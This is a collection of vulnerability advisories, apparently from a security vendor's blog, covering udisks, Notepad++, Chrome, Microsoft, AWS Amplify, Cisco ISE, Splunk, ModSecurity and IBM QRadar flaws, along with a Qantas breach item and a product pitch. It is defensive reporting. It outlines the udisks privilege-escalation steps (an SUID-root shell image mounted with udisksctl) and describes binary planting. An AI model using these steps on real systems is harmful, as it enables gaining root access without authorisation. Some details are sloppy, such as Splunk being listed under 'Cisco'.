Summary : A local privilege escalation vulnerability poc has been released, tracked as CVE-2025-6019, discovered in the udisksd daemon and its backend libblockdev library, affecting widely used Linux distributions including Fedora and SUSE.
Severity
High
CVSS Score
7.0
CVEs
CVE-2025-6019
POC Available
Yes
Actively Exploited
No
Exploited in Wild
No
Advisory Version
1.0
Overview
CVE-2025-6019 is a local privilege escalation (LPE) vulnerability affecting systems where:
udisksd is installed and running (e.g., Fedora, SUSE)
Users in the allow active group are trusted to execute disk-related actions
libblockdev fails to validate privileged backend operations under unprivileged contexts
This flaw allows unprivileged users in the “allow_active” group to escalate privileges and execute commands as root by exploiting insecure trust boundaries in D-Bus IPC communication.
Vulnerability Name
CVE ID
Product Affected
Severity
Local Privilege Escalation Vulnerability
CVE-2025-6019
udisksd / libblockdev
High
Technical Summary
This vulnerability is triggered when an attacker in the “allow_active” group issues a crafted D-Bus request to the udisksd daemon using tools like udisksctl. Because the daemon improperly relies on group membership alone (without UID validation), it mistakenly grants root-level mount permissions.
An attacker can exploit this by
Crafting a malicious disk image (like XFS with a SUID-root shell).
Using “udisksctl mount -b /dev/loop0” to mount it as root.
Escalating privileges and compromising the system.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-6019
Fedora, SUSE, and other Linux distros using udisks2/libblockdev
Improper user validation in D-Bus authorization allows unprivileged users to perform privileged disk operations.
Local privilege escalation to root
Remediation:
Here are the recommendations below
Update “udisks2” and “libblockdev” to the latest versions provided by your distribution.
Audit and restrict membership of the “allow_active” group.
Disable unsafe or legacy D-Bus actions in system services where possible.
Conclusion: CVE-2025-6019 highlights a breakdown in privilege boundary enforcement within a core system component used by many Linux desktop environments.
The availability of a public PoC, combined with the low complexity of exploitation, makes this vulnerability highly dangerous, particularly in multi-user or shared computing environments.
Organizations must act swiftly to patch vulnerable systems, reassess group-based privilege models and implement stricter D-Bus and Polkit rules to reduce attack surface.
Third-party vendors are critical to and business or industry – but they confirm to significant amount of cyber risk. Qanatas airline confirmed of cyber attack where nearly six million customers data may have been compromised. The airliner issued statement that said credit card details, financial information, and passport details were not part of the breach.
Qantas said in a statement: “We are continuing to investigate the proportion of the data that has been stolen, though we expect it will be significant. An initial review has confirmed the data includes some customers’ names, email addresses, phone numbers, birth dates and frequent flyer numbers.”
The alarming aspect of a third-party data breach is the sheer scale of impact. Hackers have the potential to attack thousands of organizations in one fell swoop.
KPMG, study showed how 73% of organizations have experienced at least one significant disruption from a third-party cyber incident within the last three years.
Qantas Group chief executive Vanessa Hudson said the company was working closely with the National Cyber Security Coordinator and the Australian Cyber Security Centre.
We sincerely apologies to our customers and we recognize the uncertainty this will cause. Our customers trust us with their personal information, and we take that responsibility seriously,” she said.
In the breach that affected Qantas airliner which is one of the oldest, did not point to any hackers group. This data breach is one of Australia’s biggest breach in years which caused major setback and reputation damage to an airliner.
Last week, FBI said Scattered Spider group was targeting airlines and that Hawaiian Airlines (HAII.UL) and Canada’s WestJet had already reported breaches. Read more on our blogs:
Key pointer of the Qantas Breach
The Cyber hacker broke into a database containing the personal information of millions of customer.
The breach was executed by hackers who targeted a call center and gained access to a third-party customer service platform containing six million names, email addresses, phone numbers, birth dates and frequent flyer numbers.
Third party risk management is complex but neglecting can be fatal for organizations whose data volume is huge such as airliners.
The airline is emailing affected customers and has set up a dedicated support line at 1800 971 541 (or +61 2 8028 0534 from overseas).
If we observe in recent past 2020, the solar Winds attack that happened where Solar winds confirmed that its network had been penetrated by a malicious actor and a complex malware program inserted into software updates of its technology platform – SolarWinds OrionⓇ.
Such is the magnitude of the attack that the malware program comprised a multistage process, scanning downstream customer networks to detect security tools it could avoid or disable, and stealthily connecting to the attacker’s command and control servers. The malware persisted for months before initial detection.
The solar winds attack cost to the company amounted to significant loss with Incident response and forensic services cost companies 11% of their annual revenue (an average of $12 million).
How to make sure your vendor don’t create unnecessary risk that pose challenge for organization at large
First ensure your third party vendor’s meet the required robust security posture
Vendor risk assessment must be done holistically by streamlining due diligence
Upon discovery of any vulnerabilities, it is important that customizing and updating security requirements of the newly discovered threats and patch.
As a part of better threat mitigation strategy it is important that to automate vendors onboarding this will provide agility.
Managing Third party risk with Intru360
A research with KPMG found that found 61% of businesses underestimate third party risk management and often also struggle to have a healthy operation model and scale it same time.
KPMG research further found that Third-party/nth-party risk management that covers all third-party relationships over the entire life cycle; subjects vendors that support critical activities or are heavily relied upon to more comprehensive and rigorous oversight; and considers transition, contingency, recovery, and duplicity alternatives.
With most of the technology investments fail to provide visibility into third-party risk, we at Intercept help you to expand the scope and cover third parties related risk areas by identifying.
Intru360 gives security analysts and SOC managers a clear view across the organization, helping them fully understand the extent and context of an attack. It also simplifies workflows by automatically handling alerts, allowing for faster detection of both known and unknown threats.
In vendor security and management here are some of the features we offer to make sure cyber health of each and every supplier is checked and alerts are placed to get notification.
Prebuilt playbooks and automated response capabilities.
Over 400 third-party and cloud integrations.
More than 1,100 preconfigured correlation rules.
Ready-to-use threat analytics, threat intelligence service feeds, and prioritization based on risk.
Security Advisory:A high-severity privilege escalation vulnerability has been discovered in the Notepad++ v8.8.1 and prior installer, which allows local attackers to gain SYSTEM-level privileges through uncontrolled executable search paths (binary planting).
The installer searches for executable dependencies in the current working directory without verification, allowing attackers to place malicious executables that will be loaded with SYSTEM privileges during installation.
OEM
Notepad++
Severity
High
CVSS Score
7.3
CVEs
CVE-2025-49144
POC Available
Yes
Actively Exploited
No
Exploited in Wild
No
Advisory Version
1.0
Overview
Exploitation requires minimal user interaction and a public Proof of Concept (PoC) is available. The issue is resolved in version v8.8.2.
Vulnerability Name
CVE ID
Product Affected
Severity
Fixed Version
Privilege Escalation Vulnerability
CVE-2025-49144
Notepad++
High
v8.8.2
Technical Summary
The Notepad++ installer improperly searches for executable dependencies in the current directory without verifying their authenticity.
This insecure behavior allows attackers to place a malicious executable (e.g. regsvr32.exe) in the same directory as the installer. Upon execution the malicious file is loaded with SYSTEM-level privileges, granting full control over the machine.
In real world scenario, an attacker could use social engineering or clickjacking to trick users into downloading both the legitimate installer and a malicious executable to the same directory (typically Downloads folder – which is known as Vulnerable directory). Upon running the installer, the attack executes automatically with SYSTEM privileges.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-49144
Notepad++ v8.8.1 and prior.
The installer invokes executables without absolute path (e.g. regsvr32), allowing a malicious binary in the same directory to be executed with elevated privileges.
SYSTEM privilege escalation and full machine control
Proof of Concept (PoC):
Execution Flow: Attacker places a fake regsvr32.exe in the same directory as the Notepad++ installer.
Trigger: When the user runs the installer, it loads the attacker’s file with SYSTEM privileges.
Evidence:
Process Monitor logs confirm that the installer is searching for executables in the local directory.
A video demonstration confirms successful SYSTEM-level access via reverse shell.
Public PoC materials are hosted and shared, confirming reproducibility
Remediation:
Immediate Action: Upgrade to Notepad++ v8.8.2 or later which explicitly sets absolute paths when invoking executables like regsvr32.
Recommendations:
Configuration Check: Avoid executing installers from user-writable locations like the Downloads folder. Ensure installers are run from isolated, trusted directories.
Environment Hardening: Implement endpoint detection for binary planting, restrict execution in commonly targeted directories.
Conclusion: CVE-2025-49144 is a critical privilege escalation vulnerability with a working public PoC. It leverages a fundamental flaw in the Notepad++ installer’s handling of executable paths.
Given the low barrier to exploit and high impact, especially in environments where Notepad++ is widely used, immediate remediation is strongly advised. The presence of similar flaws in past versions highlights the persistent risk of insecure software packaging.
This is a critical security vulnerability requiring immediate attention. While Microsoft classifies some binary planting issues as “Defense-in-Depth,” the severity of gaining SYSTEM privileges with minimal user interaction warrants priority remediation.
A newly-patched zero-day vulnerability in Google Chrome CVE-2025-2783 which was exploited in the wild by a threat actor TaxOff, leading to the deployment of Trinper which an advanced backdoor.
The CVE-2025-2783 exploited a sandbox escape vulnerability within Google Chrome’s Mojo IPC (Inter-Process Communication) framework, which allowed attackers to bypass the browser’s security sandbox and lead to RCE.
TaxOff Threat Actor
TaxOff is a highly sophisticated Advanced Persistent Threat (APT) group primarily targeting government organizations which is known for its use of advanced social engineering tactics, often involving phishing campaigns that exploit themed around financial reporting and regulatory compliance.
The CVE-2025-2783 vulnerability was first detected in March 2025 after Kaspersky reported real-world exploitation.
TaxOff used a phishing-based delivery method, which involved embedding a malicious link in emails masquerading as invitations to legitimate events like the Primakov Readings forum.
Once the link was clicked, the CVE-2025-2783 exploit was triggered, leading to the deployment of the Trinper backdoor. It was a one-click compromise that delivered a highly tailored payload with surgical precision.
Trinper Backdoor
This is a multi-threaded C++ backdoor that collected host data, logged keystrokes, exfiltrated targeted documents like document, excel or pdf files and maintained remote access.
But this wasn’t just a “plug-and-play” backdoor. Trinper’s loader employed five layers of encryption, utilizing ChaCha20, modified BLAKE2b hashes, and even machine-specific environmental checks. It was decrypted only on intended systems, using unique hardware identifiers like firmware UUIDs and PEB structures.
Source: global.ptsecurity.com
Interestingly, researchers found that Team46, a different APT group shares many similarities with TaxOff in terms of TTPs. This overlap raises the possibility that TaxOff and Team46 are the same group operating under different aliases.
Both groups have used PowerShell-based loaders and Cobalt Strike as their primary exploitation vectors.
This flaw allows threat actors to:
Execute arbitrary code
Bypass Chrome’s built-in security sandbox
Potentially gain remote control over the system
Recommendation
The rapid exploitation of CVE-2025-2783 highlights the critical importance of timely patch management. Google released a fix for this vulnerability in March 2025, and all users are strongly advised to update their Chrome browsers to the latest version immediately.
In addition to patching, organizations should implement the following defensive measures
Enhance email filtering systems and provide regular phishing awareness training for employees.
Continuously monitor systems for unusual or suspicious behavior related to script execution or network anomalies.
Restrict the execution of unsigned or obfuscated scripts and macros, particularly in email attachments or downloaded files, using tools like AppLocker or Microsoft Defender ASR.
Summary : Microsoft’s June 2025 Patch Tuesday addresses a total of 67 vulnerabilities across its product ecosystem. Critical flaws in WebDAV, SMB, SharePoint and Remote Desktop Services highlight the urgency of installing this month’s updates.
OEM
Microsoft
Severity
Critical
Date of Announcement
2025-06-10
No. of Vulnerabilities Patched
67
Actively Exploited
Yes
Exploited in Wild
Yes
Advisory Version
1.0
Overview
These include multiple high-risk flaws and two zero-day vulnerabilities one actively exploited and one publicly disclosed affecting core components like Windows WebDAV and the SMB Client.
67 Microsoft CVEs addressed
3 non-Microsoft CVEs addressed
Breakdown of May 2025 Vulnerabilities
25 Remote Code Execution (RCE)
17 Information Disclosure
14 Elevation of Privilege (EoP)
6 Denial of Service (DoS)
3 Security Feature Bypass
2 Spoofing
2 Chromium (Edge) Vulnerabilities
1 Windows Secure Boot
Vulnerability Name
CVE ID
Product Affected
Severity
CVSS Score
WebDAV Remote Code Execution (Exploited in the wild)
CVE-2025-33053
Windows
High
8.8
SMB Client Elevation of Privilege (Publicly disclosed)
CVE-2025-33073
Windows
High
8.8
Technical Summary
Two zero-day vulnerabilities in Microsoft’s ecosystem were addressed in June 2025. One of these, CVE-2025-33053, has been exploited in the wild and affects the deprecated but still present WebDAV component in Windows. The other, CVE-2025-33073, was publicly disclosed and affects the Windows SMB client, enabling attackers to elevate privileges.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-33053
Windows 10,11 and Windows Server
WebDAV RCE triggered when a user clicks a malicious link. Exploited by APT group “Stealth Falcon.” Exploitation complexity is low.
Remote Code Execution
CVE-2025-33073
Windows 10,11 and Windows Server
EoP flaw in SMB Client. Exploitation may occur by connecting to a malicious SMB server. Privilege elevation to SYSTEM is possible.
Elevation of Privilege
Source: Microsoft and NVD
In addition to the zero-day vulnerabilities, several other critical and high-severity issues were addressed:
CVE-2025-47162, CVE-2025-47164, CVE-2025-47167: Microsoft Office, Preview Pane-based RCE vulnerabilities, exploitation more likely (CVSS 8.4)
CVE-2025-47172: Microsoft SharePoint Server, SQL injection-based RCE (CVSS 8.8)
CVE-2025-29828: Windows Cryptographic Services, memory release issue (CVSS 8.1)
CVE-2025-32710: Windows Remote Desktop Services, use-after-free vulnerability (CVSS 8.1)
CVE-2025-29976: Microsoft SharePoint, Local privilege escalation (CVSS 7.8)
CVE-2025-30393: Microsoft Excel, RCE via malicious Excel file (CVSS 7.8)
CVE-2025-24063: Windows Kernel, Local privilege escalation, marked “Exploitation More Likely” (CVSS 7.8)
CVE-2025-26685: Microsoft Defender for Identity, Spoofing via NTLM fallback, exploitable in adjacent networks (CVSS 6.5)
Remediation:
Apply Patches Promptly: Install the June 2025 security updates immediately to mitigate risks.
General Recommendations:
Prioritize Zero-Days: Focus on patching the two confirmed zero-day vulnerabilities, especially those allowing Elevation of Privilege and remote code execution.
Disable Deprecated Services: If not required, disable WebDAV (WebClient service) and SMBv1 to reduce exposure.
Enforce SMB Signing: Use Group Policy to mandate SMB signing, reducing the risk from CVE-2025-33073.
Monitor for Exploitation Attempts: Watch for suspicious SMB or WebDAV traffic in logs and endpoint detection systems.
Enable Auto Updates Where Feasible: For individual endpoints and less tightly controlled systems, enable automatic updates to maintain regular patch schedule.
Conclusion:
Microsoft’s June 2025 Patch Tuesday addresses two important zero-day vulnerabilities, including an actively exploited RCE in WebDAV tracked as CVE-2025-33053.
Organizations should prioritize these patches to mitigate risk from real-world threats. The CVE-2025-33053 vulnerability has also been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, emphasizing its urgency.
Summary: A critical security vulnerability has been disclosed in AWS Amplify Studio’s UI generation framework, with researchers releasing a proof-of-concept exploit demonstrating remote code execution capabilities.
OEM
AWS
Severity
Critical
CVSS Score
9.5
CVEs
CVE-2025-4318
POC Available
Yes
Actively Exploited
No
Exploited in Wild
No
Advisory Version
1.0
Overview
A critical vulnerability has been discovered in AWS Amplify Studio’s UI generation tool, @aws-amplify/codegen-ui, which allows Remote Code Execution (RCE) during build or render time.
Tracked as CVE-2025-4318, this flaw originates from unsafe evaluation of user-defined JavaScript expressions without proper input validation or sandboxing.
It has been assigned a CVSS score of 9.5. Exploitation could lead to unauthorized command execution, leakage of AWS secrets, or full compromise of CI/CD environments. AWS addressed the issue in version 2.20.3, replacing the unsafe eval() with a sandboxed expression evaluator.
Vulnerability Name
CVE ID
Product Affected
Severity
Fixed Version
Unsafe Expression Evaluation in Codegen-UI
CVE-2025-4318
@aws-amplify/codegen-ui
Critical
2.20.3
Technical Summary
The vulnerability stems from how AWS Amplify Studio processed dynamic expressions defined in component fields (eg: label, placeholder).
In affected versions, these expressions were directly evaluated using eval() without any filtering or validation, assuming they were safe.
This behavior enabled attackers to inject malicious code into UI schemas that would execute during the build or runtime process particularly dangerous in CI/CD pipelines where secrets and environment variables are accessible.
A working Proof-of-Concept (PoC) has been developed and shared by researchers, which simulates the exploit using a crafted JSON component, a Node.js script and a Python server. The PoC demonstrates successful RCE via malicious input evaluated by the vulnerable tool.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-4318
AWS Amplify Studio (<=2.20.2)
Vulnerable versions used eval() to interpret stringified JavaScript expressions in UI components. This allowed injection of malicious expressions such as shell commands, due to the absence of validation or blacklisting.
RCE, exposure of secrets, CI/CD compromise, unauthorized system control
Remediation:
Upgrade Immediately: Update @aws-amplify/codegen-ui to version 2.20.3 or later, which replaces unsafe evaluation logic with a sandboxed function (safeEval) and a keyword blacklist.
Conclusion: CVE-2025-4318 is a severe RCE vulnerability in AWS Amplify Studio caused by unsafe evaluation of JavaScript expressions during UI component rendering or generation.
A fully functional PoC exploit has been published, which clearly demonstrates the risk of using eval() in dynamic application code without input validation.
The fixed version mitigates this risk by introducing a sandboxed evaluation mechanism and filtering dangerous keywords. Organizations using Amplify Studio should upgrade immediately and audit all inputs and build processes for safety.
AWS security teams have advised developers to immediately upgrade to version 2.20.3 or later and audit all existing component schemas for potentially unsafe expressions.
The incident highlights the critical importance of implementing secure coding practices in low-code development platforms where user input directly influences code generation and execution processes.
Cisco has disclosed a critical vulnerability in Identity Services Engine (ISE) cloud deployments that allows unauthenticated remote attackers to gain administrative access across multiple instances due to improperly generated static credentials.
Tracked as CVE-2025-20286, with a CVSS score of 9.9, this flaw affects ISE deployments on AWS, Microsoft Azure, and Oracle Cloud Infrastructure (OCI). Cisco has released hotfixes and announced permanent fixes for impacted versions.
Vulnerability Name
CVE ID
Product Affected
Severity
Cisco ISE Shared Credential Vulnerability
CVE-2025-20286
Cisco ISE
Critical
Technical Summary
The vulnerability stems from improper generation of credentials during the setup of Cisco ISE on cloud platforms. Each deployment of the same ISE version on a given platform (eg – AWS 3.1) shares identical static credentials. This oversight enables an attacker to extract credentials from one deployment and reuse them to access others, if network access is available.
This issue is only to cloud-hosted Primary Administration nodes. Traditional on-premises deployments or hybrid setups with local admin nodes are not affected.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-20286
Cisco ISE 3.1 – 3.4
Static credentials reused across same-version cloud deployments. Credentials can be extracted from one instance and reused across others on the same cloud platform
Access sensitive data
Remediation:
Apply Hotfix Immediately: Install the universal hotfix ise-apply-CSCwn63400_3.1.x_patchall-SPA.tar.gz on ISE versions 3.1 to 3.4.
Conclusion: CVE-2025-20286 presents a severe security risk to organizations using Cisco ISE on public cloud platforms. By exploiting shared static credentials, attackers can potentially move laterally between cloud deployments.
Although no active exploitation has been reported, a proof-of-concept (PoC) exploit is available, heightening the urgency for remediation.
Organizations should apply hotfixes immediately, upgrade to secured versions, and tighten cloud network access policies to mitigate the risk. On-premises and hybrid deployments remain unaffected, offering a safer architectural alternative.
Splunk has disclosed a medium-severity cross-site scripting (XSS) vulnerability affecting multiple versions of its Enterprise and Cloud Platform products that could allow low-privileged attackers to execute malicious JavaScript code in users’ browsers.
OEM
Cisco
Severity
MEDIUM
CVSS Score
4.3
CVEs
CVE-2025-20297
CWEs
CWE-79
Exploited in Wild
No
Advisory Version
1.0
Overview
A security vulnerability identified as CVE-2025-20297 has been found in older versions of Splunk Enterprise and Splunk Cloud Platform.
This issue allows low privileged users to execute unauthorized JavaScript code in a victim’s browser using a specific Splunk feature that generates Pdf from dashboards.
Although the vulnerability is rated as Medium (CVSS 4.3) but it could be a significant risk in environments where Splunk Web is widely accessed by users.
The vulnerability specifically targets instances with Splunk Web enabled, which represents the majority of production deployments given the component’s central role in dashboard management and user interface functionality.
Vulnerability Name
CVE ID
Product Affected
Severity
Fixed Version
Reflected Cross Site Scripting
CVE-2025-20297
Splunk Enterprise & Cloud
Medium
Check the remediation section.
Technical Summary
The vulnerability lies in the pdfgen/render REST endpoint used to create dashboard PDFs. In vulnerable versions, a low \privileged user (not an admin or power user) can inject a malicious script via this endpoint.
If a legitimate user interacts with the resulting PDF or link, their browser may execute the injected script without their consent, this is working as reflected XSS.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-20297
Splunk Enterprise & Cloud multiple versions
Low-privileged users can exploit the pdfgen/render endpoint to inject unauthorized JavaScript code into a victim’s browser.
Code Execution/Reflected xss.
Remediation:
Splunk has released updates, that addressed the vulnerability:
Splunk Enterprise: Upgrade to version 9.4.2, 9.3.4, 9.2.6, 9.1.9 or latest.
Splunk Cloud Platform: Upgrade to version 9.3.2411.102, 9.3.2408.111, 9.2.2406.118 or latest.
If you cannot upgrade immediately, you can disable Splunk Web to prevent exploitation. For this you can review the web.conf configuration file and follow the Splunk guidance on disabling unnecessary components.
Disabling Splunk Web may impact users who rely on the web interface so consider access controls or network-based restrictions as temporary mitigations.
Conclusion: While CVE-2025-20297 is rated as a medium severity vulnerability, it should not be ignored in the environments where many users interact with Splunk dashboards. Attackers with limited permissions could potentially target higher privileged users by modifying malicious links or payloads.
Organizations should prioritize upgrading Splunk to the fixed versions or implementing the workarounds immediately.
Even though this vulnerability requires some user interaction, the risks include unauthorized access to sensitive data through potential session hijacking.
While Splunk has not provided specific detection methods for this vulnerability, organizations should monitor access patterns to the pdfgen/render endpoint and review user privilege assignments to minimize potential exposure
This vulnerability poses a significant risk to organizations relying on Splunk’s data analytics platform for security monitoring and business intelligence operations.
ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx.
OEM
ModSecurity
Severity
HIGH
CVSS Score
7.5
CVEs
CVE-2025-48866
CWEs
CWE-1050
Exploited in Wild
No
Advisory Version
1.0
Overview
A Denial of Service (DoS) vulnerability has been identified in ModSecurity, an open-source web application firewall (WAF) used with Apache, Nginx and IIS.
The issue affects versions prior to 2.9.10 and related to the “sanitiseArg” action, which can be exploited by adding an excessive number of arguments, ultimately causing the system to fail or crash. The vulnerability has been fixed in version 2.9.10.
There is no user interaction required to trigger, exploiting it can lead to significant resource consumption, resulting in service disruption.
Vulnerability Name
CVE ID
Product Affected
Severity
Fixed Version
Denial of Service (DoS) vulnerability
CVE-2025-48866
Modsecurity WAF
High
v2.9.10
Technical Summary
The vulnerability arises from the behavior of the “sanitiseArg” (also referred to as “sanitizeArg”) action in ModSecurity. This action sanitizes a specific argument passed to a rule (e.g.- password), masking it in the logs by replacing its value with asterisks (*).
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-48866
ModSecurity (mod_security2.x) prior to v2.9.10
When a rule uses the sanitiseArg action, it processes each argument that matches the specified name (e.g – password). If a large number of matching arguments (e.g.- 500 or more) are passed, ModSecurity repeatedly adds them to memory, which can lead to excessive memory consumption and potentially crash the system.
System crashes due to resource exhaustion (DoS)
Remediation:
Apply Patches Promptly: Upgrade to ModSecurity version 2.9.10 or the latest one.
Avoid using the “sanitizeArg” or “sanitizeArg” actions in your rules. If these actions are not used, the engine will not be affected by the vulnerability.
Conclusion: This vulnerability is similar to this CVE-2025-47947 issue, presents a significant risk, especially for organizations relying on ModSecurity 2.x versions for web application protection.
Although the vulnerability is rated as high, it requires a specific set of conditions to be exploited. But to ensure the continued stability and security of web applications, the fix needs to be applied as soon as possible.
Multiple vulnerabilities have been discovered in IBM QRadar Suite Software and Cloud Pak, affecting versions 1.10.0.0 through 1.11.2.0.
The company released patches on June 3, 2025, addressing five distinct Common Vulnerabilities and Exposures (CVEs) that affect enterprise security infrastructure used by organizations worldwide.
These include risks such as remote code execution, information disclosure, session hijacking, and denial of service. The most critical vulnerability (CVE-2025-25022) allows unauthenticated access to sensitive configuration files. IBM has released version 1.11.3.0 to address these issues.
Vulnerability Name
CVE ID
Product Affected
CVSS Score
Severity
Information Disclosure Vulnerability
CVE-2025-25022
IBM Cloud Pak, QRadar Suite
9.6
Critical
Code Execution Vulnerability
CVE-2025-25021
IBM QRadar SIEM
7.2
High
Denial of Service Vulnerability
CVE-2025-25020
IBM QRadar SIEM
6.5
Medium
Session Hijacking Vulnerability
CVE-2025-25019
IBM QRadar SIEM
4.8
Medium
Web Cache Disclosure Vulnerability
CVE-2025-1334
IBM QRadar Suite
4.0
Medium
Technical Summary
The identified vulnerabilities affect both the IBM QRadar Suite and Cloud Pak, exposing them to a variety of threats such as unauthorized access, arbitrary code execution, and denial of service.
These flaws arise from weaknesses in session handling, code generation, API validation, and file configuration security.
CVE ID
System Affected
Vulnerability Details
Impact
CVE-2025-25022
QRadar SIEM
Unauthenticated access to sensitive config files due to poor protections.
Information disclosure, RCE
CVE-2025-25021
QRadar SIEM
Privileged code execution due to improper script code generation in case management.
Remote Code Execution
CVE-2025-25020
QRadar SIEM
API input validation flaw allowing service crash via malformed data
Denial of Service
CVE-2025-25019
QRadar SIEM
Sessions not invalidated upon logout, enabling impersonation by attackers.
Session Hijacking
CVE-2025-1334
QRadar Suite
Cached web content readable by other users, compromising multi-user data confidentiality.
Local Info Disclosure
Remediation:
Apply Latest Fix: Upgrade to IBM QRadar Suite Software and Cloud Pak version 1.11.3.0 or later.
Refer to IBM’s official installation and upgrade documentation for detailed steps.
Conclusion: These vulnerabilities pose significant security risks, especially CVE-2025-25022 with a critical severity score of 9.6. Organizations using the affected IBM QRadar and Cloud Pak versions should prioritize upgrading to latest version to mitigate exposure.
IBM has acknowledged these issues and released patches to address all five vulnerabilities.
Notably, IBM has identified no effective workarounds or mitigations for these vulnerabilities, making patching the only viable protection strategy.
